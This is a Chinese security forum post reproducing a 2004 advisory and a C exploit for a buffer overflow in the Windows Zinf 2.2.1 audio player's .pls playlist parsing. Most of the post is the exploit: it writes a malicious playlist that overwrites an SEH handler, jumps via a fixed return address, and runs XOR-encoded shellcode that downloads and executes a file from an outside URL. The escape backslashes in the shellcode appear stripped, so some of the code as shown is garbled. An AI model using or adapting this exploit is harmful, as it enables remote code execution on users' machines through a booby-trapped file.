‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Remote exploit for Zinf 2.2.1

冰血封情

老林

团队决策人

Rank: 9Rank: 9Rank: 9

E.S.T运营责任人

帖子
6819 
精华
834 
积分
36070 
阅读权限
255 
性别
男 
来自
中国 
在线时间
586 小时 
注册时间
2004-6-25 
最后登录
2008-9-6 

优秀管理奖 资料收集奖 原创技术奖 核心建议奖

楼主 发表于 2004-10-5 02:02  只看该作者

Remote exploit for Zinf 2.2.1

文章作者:Luigi Auriemma <aluigi(aaaatttttt)autistici[D000t]org>
复制内容到剪贴板
代码:
/*
-------------------------------Advisory----------------------------------
Luigi Auriemma <aluigi(aaaatttttt)autistici[D000t]org>

I don&#39;t know why this bug has not been tracked but moreover I don&#39;t
completely know why it has not been fixed yet in the Windows version of
Zinf.

In short, Zinf is an audio player for Linux and Windows: [url]http://www.zinf.org[/url]
The latest Linux version is 2.2.5 while the latest Windows version is 2.2.1
which is still vulnerable to a buffer-overflow bug in the management of the
playlist files ".pls".

This bug has been found and fixed by the same developers in the recent
versions for Linux but, as already said, the vulnerable Windows version is
still downloadable and can be exploited locally and remotely through the web
browser and a malicious pls file.

A simple proof-of-concept to test the bug is available here:

  [url]http://aluigi.altervista.org/poc/zinf-bof.pls[/url]

That&#39;s all, just to keep track of this bug and to warn who uses the Windows
version.


BYEZ
--------------------------------------------------------------------------
hey Luigi how much Advisories do you release every month??maybe 30 ;)??
sometimes i think your day has 48 hours ;)

best regards



----------------------------------------------------------------------------
this exploit generates a file exploit.pls which overflows a seh handler
jumps into a service pack independent address then it downloads and executes a file


  you can also download this exploit i a rar file([url]www.delikon.de[/url]).
  in this rar file you will find some screenshots, from OllyDbg
  which is maybe useful for beginners


*/

#include <stdio.h>
#include <windows.h>

#define SIZE 4048


char shellcode[] = "xEB"//xored with 0x1d
"x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF"
"xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13"
"xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2"
"xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90"
"x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2"
"xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48"
"x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43"
"x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96"
"x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD"
"xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47"
"x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D"
"x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33"
"x78x65x78x1D";







int main(){

char buffer[SIZE];
char exploit[]="exploit.pls";
char head[]="[playlist]File1=";
int i=0;
ULONG bytes=0;
char *pointer=NULL;
//for the decoder
short int weblength=0xff22;


ULONG RetAddr=0x10404DC4;
/*
SERVICE PACK independent
httpinput.pmi
10404DC4    5D          POP EBP
10404DC5    B8 18000000    MOV EAX,18
10404DCA    5B          POP EBX
10404DCB    C2 0800      RETN 8
*/
//jump into nops
DWORD jump=0x909025eb;
HANDLE file=NULL;

//this is a small messageBox app
char web[]="[url]http://www.delikon.de/klein.exe[/url]";


printf("A Buffer overflow exploit against Zinf 2.2.1 for Win32n");
printf("Coded by Delikon|[url]www.delikon.de[/url]|27.9.04n");
printf("all credits goes to Luigi Auriemman");
printf("n [+] generate exploit.plsn");



memset(buffer,0x00,SIZE-1);


file = CreateFile(exploit, GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_ARCHIVE,NULL);

if(file == (HANDLE)0xffffffff){

      printf("t[+] error opening the filen");
      printf("PRESS A KEYn");
      getchar();
      return -1;

}      
      strcpy(buffer,head);
      
      memset(buffer+strlen(buffer),0x61,17);
      //nops
      memset(buffer+strlen(buffer),0x90,20);
      //
      strcat(buffer,shellcode);
      //search for the shellcode length
      pointer=strstr(buffer,"x22xff");
      //weblength[0]-=strlen(web)+1;
      weblength-=strlen(web)+1;
      //increase it
      memcpy(pointer,&weblength,2);
      

      //copy the url in the buffer
      strcat(buffer,web);


      //xor the url with 0x1d
      while(*(buffer+strlen(buffer)-strlen(web)+i)){

      
           *(buffer+strlen(buffer)-strlen(web)+i)=*(buffer+strlen(buffer)-strlen(web)+i)^0x1d;
           i++;
      }
      
      *(buffer+strlen(buffer)-strlen(web)+i)=0x1d;

      //copy the filling
      memset(buffer+strlen(buffer),0x61,517-strlen(buffer));
      //also filling ;)
      memcpy(buffer+strlen(buffer),&RetAddr,4);
      
      memset(buffer+strlen(buffer),0x41,4);
      memset(buffer+strlen(buffer),0x42,4);
           
      //jump 24 bytes forward
      memcpy(buffer+strlen(buffer),&jump,4);
      //jump into pop reg pop reg ret
      memcpy(buffer+strlen(buffer),&RetAddr,4);
      memset(buffer+strlen(buffer),0x45,4);
      memset(buffer+strlen(buffer),0x46,4);
      memset(buffer+strlen(buffer),0x47,4);
      
      

      WriteFile(file,buffer,strlen(buffer),&bytes,0);

      CloseHandle(file);
      printf("n [+] ready press a keyn");
      getchar();


      exit(1);

      
}

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题